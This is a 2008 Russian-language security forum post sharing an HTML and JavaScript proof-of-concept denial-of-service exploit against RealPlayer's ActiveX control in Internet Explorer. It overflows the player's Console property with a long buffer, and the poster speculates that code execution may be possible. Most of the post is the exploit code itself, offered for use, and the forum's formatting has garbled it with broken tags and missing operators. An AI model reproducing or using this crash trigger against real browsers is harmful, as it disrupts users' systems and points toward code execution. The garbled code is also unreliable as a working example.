RealPlayer ActiveX Remote Denial of Service Exploit

Discussion in 'Уязвимости' started by Евгений Минаев, 12 Mar 2008.

  1. Евгений Минаев

    Евгений Минаев Elder - Старейшина

    Joined:
    12 Nov 2007
    Messages:
    55
    Likes Received:
    169
    Reputations:
    159
    При запуске скрипта Интернет Эксплорер просто виснет и в последствие убивается через менеджер задач. Скорей всего возможно исполнение кода, по крайней мере автор не пробовал. Написано по эдвайсори Элазара Брода, техническое описание бага взято в чьем-то блоге.

    PHP:
    <html>
        <
    head>
            <
    object classid='clsid:{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}' id='player'></object>
        </
    head>
        <
    body>
            <
    script type="text/javascript">
            
                if (
    player.GetMute() == false){
                    var 
    buffer "\x0a";
                    var 
    tempel 0;
                    while (
    buffer.length 200buffer += "\x0a";
                    for (
    temp 0temp 15;temp++){
                        
    tempel player.Console;
                        
    player.Console buffer+tempel;
                    }
                } else {
                    
    alert('No RealPlayer Found');
                }
                
            
    </script>
        </body>
    </html>
     
    #1 Евгений Минаев, 12 Mar 2008
    Last edited: 12 Mar 2008
    5 people like this.